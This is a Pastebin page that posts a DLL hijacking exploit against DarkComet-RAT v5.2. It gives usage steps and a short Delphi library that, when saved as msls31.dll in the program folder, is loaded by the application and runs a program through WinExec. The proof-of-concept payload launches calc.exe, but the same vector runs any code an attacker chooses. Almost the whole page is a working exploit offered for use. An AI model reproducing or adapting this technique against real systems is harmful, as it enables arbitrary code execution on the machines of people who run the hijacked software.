Advertisement
5rabq8

DarkComet-RAT v5.2 Dll Hijacking Exploit (msls31.dll)

Apr 11th, 2012
260
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. =============================================
  2. DarkComet-RAT v5.2 Dll Hijacking Exploit (msls31.dll)
  3. ==============================================
  4.  
  5. /*
  6. #DarkComet-RAT v5.2 Dll Hijacking Exploit (msls31.dll)
  7. #Author : Dr.5RaB HackEr
  8. #Greetz : 9Y3H.511 , HaCkErS eV!L , ViP 511 , , Sam7tk
  9.  
  10. HaCkEr , Mr.Adis , Mr.JL6h , HmooDi , Dmar Al3no0oZ , Jn0n
  11.  
  12. H4x0r , Dr.MeShAl , X-SHADOW
  13. #contact: Opl@live.com
  14. #Tested on: Windows 7 Ultimate
  15.  
  16. #How to use :
  17.  
  18. Take only the codes and put it in Delphi and Save by name
  19.  
  20. (msls31.dll) and put it in the program folder
  21.  
  22. #code (msls31.dll)
  23. */
  24.  
  25.  
  26. library Project2;
  27.  
  28. uses
  29. Windows;
  30. begin
  31. Winexec(PAnsichar('C:\windows\system32\calc.exe'),sw_show);
  32. end.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement